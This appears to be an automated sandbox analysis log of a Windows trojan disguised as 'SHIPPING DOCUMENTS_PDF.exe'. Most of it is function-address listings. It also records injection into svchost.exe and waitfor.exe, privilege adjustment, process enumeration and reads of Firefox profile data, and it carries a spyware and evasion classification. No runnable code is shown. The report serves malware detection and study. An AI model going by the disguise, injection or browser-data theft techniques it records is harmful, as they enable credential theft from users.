                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B8878F0_2_00B8878F
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BB88890_2_00BB8889
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B688080_2_00B68808
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BD08570_2_00BD0857
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B868440_2_00B86844
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B7CB210_2_00B7CB21
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B86DB60_2_00B86DB6
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B66F9E0_2_00B66F9E
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B630300_2_00B63030
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B731870_2_00B73187
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B7F1D90_2_00B7F1D9
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B512870_2_00B51287
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B714840_2_00B71484
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B655200_2_00B65520
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B776960_2_00B77696
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B657600_2_00B65760
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B719780_2_00B71978
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B89AB50_2_00B89AB5
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B5FCE00_2_00B5FCE0
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B7BDA60_2_00B7BDA6
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B71D900_2_00B71D90
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BD7DDB0_2_00BD7DDB
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B63FE00_2_00B63FE0
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B5DF000_2_00B5DF00
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_009B36200_2_009B3620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004C85032_2_004C8503
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004B28102_2_004B2810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004BE0F72_2_004BE0F7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004BE1032_2_004BE103
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004B31D02_2_004B31D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004B12402_2_004B1240
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004DEBD32_2_004DEBD3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004B2C8A2_2_004B2C8A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004B2C902_2_004B2C90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004B24902_2_004B2490
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004B15092_2_004B1509
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004B15102_2_004B1510
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004BFDB32_2_004BFDB3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004C67132_2_004C6713
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004BFFD32_2_004BFFD3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004BDFA92_2_004BDFA9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004BDFB32_2_004BDFB3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA3522_2_030FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F02_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031003E62_2_031003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E02742_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C02C02_2_030C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030301002_2_03030100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA1182_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C81582_2_030C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F41A22_2_030F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031001AA2_2_031001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F81CC2_2_030F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D20002_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030647502_2_03064750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030407702_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C02_2_0303C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C6E02_2_0305C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030405352_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031005912_2_03100591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E44202_2_030E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F24462_2_030F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EE4F62_2_030EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB402_2_030FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F6BD72_2_030F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA802_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030569622_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A02_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310A9A62_2_0310A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304A8402_2_0304A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030428402_2_03042840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030268B82_2_030268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E8F02_2_0306E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03082F282_2_03082F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060F302_2_03060F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E2F302_2_030E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4F402_2_030B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BEFA02_2_030BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032FC82_2_03032FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304CFE02_2_0304CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEE262_2_030FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040E592_2_03040E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052E902_2_03052E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FCE932_2_030FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEEDB2_2_030FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304AD002_2_0304AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DCD1F2_2_030DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03058DBF2_2_03058DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303ADE02_2_0303ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040C002_2_03040C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0CB52_2_030E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030CF22_2_03030CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F132D2_2_030F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D34C2_2_0302D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0308739A2_2_0308739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030452A02_2_030452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B2C02_2_0305B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED2_2_030E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307516C2_2_0307516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F1722_2_0302F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B16B2_2_0310B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304B1B02_2_0304B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF0CC2_2_030EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C02_2_030470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F70E92_2_030F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF0E02_2_030FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF7B02_2_030FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030856302_2_03085630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F16CC2_2_030F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F75712_2_030F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DD5B02_2_030DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031095C32_2_031095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF43F2_2_030FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030314602_2_03031460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFB762_2_030FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FB802_2_0305FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B5BF02_2_030B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307DBF92_2_0307DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFA492_2_030FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7A462_2_030F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B3A6C2_2_030B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DDAAC2_2_030DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03085AA02_2_03085AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E1AA32_2_030E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EDAC62_2_030EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D59102_2_030D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030499502_2_03049950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B9502_2_0305B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD8002_2_030AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030438E02_2_030438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFF092_2_030FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041F922_2_03041F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFFB12_2_030FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03003FD22_2_03003FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03003FD52_2_03003FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03049EB02_2_03049EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043D402_2_03043D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F1D5A2_2_030F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7D732_2_030F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FDC02_2_0305FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B9C322_2_030B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFCF22_2_030FFCF2
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D0E4F65_2_04D0E4F6
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D124465_2_04D12446
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D044205_2_04D04420
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D205915_2_04D20591
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C605355_2_04C60535
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C7C6E05_2_04C7C6E0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C5C7C05_2_04C5C7C0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C847505_2_04C84750
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C607705_2_04C60770
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04CF20005_2_04CF2000
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D181CC5_2_04D181CC
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D141A25_2_04D141A2
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D201AA5_2_04D201AA
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04CE81585_2_04CE8158
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C501005_2_04C50100
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04CFA1185_2_04CFA118
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04CE02C05_2_04CE02C0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D002745_2_04D00274
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D203E65_2_04D203E6
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C6E3F05_2_04C6E3F0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D1A3525_2_04D1A352
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C50CF25_2_04C50CF2
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D00CB55_2_04D00CB5
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C60C005_2_04C60C00
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C5ADE05_2_04C5ADE0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C78DBF5_2_04C78DBF
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C6AD005_2_04C6AD00
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04CFCD1F5_2_04CFCD1F
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D1EEDB5_2_04D1EEDB
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D1CE935_2_04D1CE93
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C72E905_2_04C72E90
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C60E595_2_04C60E59
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D1EE265_2_04D1EE26
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C52FC85_2_04C52FC8
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C6CFE05_2_04C6CFE0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04CDEFA05_2_04CDEFA0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04CD4F405_2_04CD4F40
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D02F305_2_04D02F30
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04CA2F285_2_04CA2F28
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C80F305_2_04C80F30
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C8E8F05_2_04C8E8F0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C468B85_2_04C468B8
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C628405_2_04C62840
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C6A8405_2_04C6A840
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C629A05_2_04C629A0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D2A9A65_2_04D2A9A6
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C769625_2_04C76962
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C5EA805_2_04C5EA80
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D16BD75_2_04D16BD7
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D1AB405_2_04D1AB40
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C514605_2_04C51460
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D1F43F5_2_04D1F43F
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D295C35_2_04D295C3
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04CFD5B05_2_04CFD5B0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D175715_2_04D17571
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D116CC5_2_04D116CC
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04CA56305_2_04CA5630
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D1F7B05_2_04D1F7B0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C670C05_2_04C670C0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D0F0CC5_2_04D0F0CC
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D1F0E05_2_04D1F0E0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D170E95_2_04D170E9
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C6B1B05_2_04C6B1B0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C9516C5_2_04C9516C
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C4F1725_2_04C4F172
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D2B16B5_2_04D2B16B
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C7B2C05_2_04C7B2C0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D012ED5_2_04D012ED
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C652A05_2_04C652A0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04CA739A5_2_04CA739A
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C4D34C5_2_04C4D34C
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D1132D5_2_04D1132D
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D1FCF25_2_04D1FCF2
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04CD9C325_2_04CD9C32
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C7FDC05_2_04C7FDC0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C63D405_2_04C63D40
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D11D5A5_2_04D11D5A
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D17D735_2_04D17D73
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C69EB05_2_04C69EB0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C23FD25_2_04C23FD2
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C23FD55_2_04C23FD5
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C61F925_2_04C61F92
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D1FFB15_2_04D1FFB1
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D1FF095_2_04D1FF09
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C638E05_2_04C638E0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04CCD8005_2_04CCD800
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C699505_2_04C69950
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C7B9505_2_04C7B950
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04CF59105_2_04CF5910
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D0DAC65_2_04D0DAC6
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04CFDAAC5_2_04CFDAAC
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04CA5AA05_2_04CA5AA0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D01AA35_2_04D01AA3
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D17A465_2_04D17A46
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D1FA495_2_04D1FA49
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04CD3A6C5_2_04CD3A6C
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C9DBF95_2_04C9DBF9
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04CD5BF05_2_04CD5BF0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C7FB805_2_04C7FB80
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04D1FB765_2_04D1FB76
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C71A205_2_02C71A20
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C6CB505_2_02C6CB50
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C6AB265_2_02C6AB26
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C6AB305_2_02C6AB30
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C6C9305_2_02C6C930
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C6AC805_2_02C6AC80
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C6AC745_2_02C6AC74
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C732905_2_02C73290
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C750805_2_02C75080
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C8B7505_2_02C8B750
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04A1E4645_2_04A1E464
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04A1E7FC5_2_04A1E7FC
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04A1E3445_2_04A1E344
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04A1D8C85_2_04A1D8C8
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04A1E8025_2_04A1E802
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 111 times
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: String function: 00B70AE3 appears 70 times
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: String function: 00B78900 appears 42 times
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: String function: 00B57DE1 appears 35 times
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: String function: 04CCEA12 appears 86 times
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: String function: 04C4B970 appears 280 times
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: String function: 04CDF290 appears 105 times
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: String function: 04CA7E54 appears 111 times
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: String function: 04C95130 appears 58 times
                Source: SHIPPING DOCUMENTS_PDF.exe, 00000000.00000003.2030539371.00000000037FD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOCUMENTS_PDF.exe
                Source: SHIPPING DOCUMENTS_PDF.exe, 00000000.00000003.2030424759.0000000003653000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOCUMENTS_PDF.exe
                Source: SHIPPING DOCUMENTS_PDF.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@17/12
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BBA06A GetLastError,FormatMessageW,0_2_00BBA06A
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BA81CB AdjustTokenPrivileges,CloseHandle,0_2_00BA81CB
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BA87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00BA87E1
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BBB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00BBB3FB
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BCEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00BCEE0D
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BC83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00BC83BB
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B54E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00B54E89
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeFile created: C:\Users\user\AppData\Local\Temp\aut84AE.tmpJump to behavior
                Source: SHIPPING DOCUMENTS_PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
